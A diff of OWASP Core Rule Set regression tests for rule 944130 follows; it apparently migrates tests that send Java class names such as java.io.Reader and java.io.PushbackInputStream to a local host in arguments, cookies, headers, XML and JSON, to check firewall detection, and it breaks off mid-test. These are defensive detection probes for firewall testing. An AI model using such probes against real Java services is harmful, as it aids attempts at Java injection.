"{\"test\": \"java.io.PrintStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-231 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PrintStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 231 desc: "Content-Type application/json arg name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PrintStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-232 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PrintStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 232 desc: "Argument test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-233 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log: + expect_ids: [944130] + - test_id: 233 desc: "Argument name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-234 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 234 desc: "Cookie test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PushbackInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-235 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PushbackInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 235 desc: "Cookie name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PushbackInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-236 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PushbackInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 236 desc: "Request header test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PushbackInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-237 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PushbackInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 237 desc: "XML attribute value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-238 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 238 desc: "XML element value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-239 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log: + expect_ids: [944130] + - test_id: 239 desc: "Nested XML element value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-240 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log: + expect_ids: [944130] + - test_id: 240 desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-241 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log: + expect_ids: [944130] + - test_id: 241 desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PushbackInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-242 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PushbackInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 242 desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PushbackInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-243 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PushbackInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 243 desc: "Argument test includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-244 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log: + expect_ids: [944130] + - test_id: 244 desc: "Argument name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-245 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader=test" + output: + log: + expect_ids: [944130] + - test_id: 245 desc: "Cookie test includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.Reader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-246 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.Reader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 246 desc: "Cookie name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.Reader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-247 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.Reader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 247 desc: "Request header test includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.Reader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-248 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.Reader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 248 desc: "XML attribute value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-249 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 249 desc: "XML element value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-250 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log: + expect_ids: [944130] + - test_id: 250 desc: "Nested XML element value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-251 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log: + expect_ids: [944130] + - test_id: 251 desc: "Content-Type text/plain includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-252 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log: + expect_ids: [944130] + - test_id: 252 desc: "Content-Type application/json arg value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.Reader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-253 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.Reader\"}" + output: + log: + expect_ids: [944130] + - test_id: 253 desc: "Content-Type application/json arg name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.Reader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-254 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.Reader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 254 desc: "Argument test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-255 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log: + expect_ids: [944130] + - test_id: 255 desc: "Argument name includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-256 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader=test" + output: + log: + expect_ids: [944130] + - test_id: 256 desc: "Cookie test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.StringReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-257 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.StringReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 257 desc: "Cookie name includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.StringReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-258 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.StringReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 258 desc: "Request header test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.StringReader - 